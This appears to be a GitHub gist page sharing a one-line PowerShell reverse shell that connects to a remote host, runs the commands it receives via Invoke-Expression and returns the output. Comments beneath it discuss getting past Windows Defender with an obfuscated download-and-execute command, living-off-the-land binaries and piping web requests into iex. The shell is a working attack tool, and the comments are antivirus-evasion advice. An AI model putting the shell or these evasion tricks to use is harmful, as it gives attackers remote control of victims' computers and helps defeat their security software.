-
Star
(192)
You must be signed in to star a gist -
Fork
(67)
You must be signed in to fork a gist
-
-
Save egre55/c058744a4240af6515eb32b2d33fbed3 to your computer and use it in GitHub Desktop.
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
It is blocking absolutely everything that tries to fetch something from remote location and execute it, even if its benign script like "calc.exe" . I tried loads of different obfuscations and tampering with the command but none worked.
For example, I tried passing the commands around in powershell and cmd:
powershell -c "$a = 'pow';$b = 'ersh';$c = 'ell';$d = ' -c ';$e = 'InVOkE-EXpreSSIoN (New-OBjECt NeT.WEbCLienT).DowNlOaDSTrinG(''http://$IP/command'')';$f=$a+$b+$c+$d+$e;cmd /c $f"
Well if it is blocking everything, maybe try a different way to deliver your payload? Instead of using powershell?
Will try to investigate some other options, thanks anyways!
Do you maybe know something else that can execute some code but Defender is keeping less tabs on it? Some other binary or anything?
You can check out various legitimate binaries on Windows that could be used to download and execute stuff from here https://lolbas-project.github.io/
Like does it block absolutely everything? or just the malicious stuff? Instead of hosting a reverse shell, host a non-malicious command on your server and execute it the same way, see if it works. If your one-liner gets blocked, try applying the obfuscation methods I mentioned above and see if it bypasses, Try using a combination of (invoke-webrequest "serverpayloaduri" ).content | iex or whatever you're using.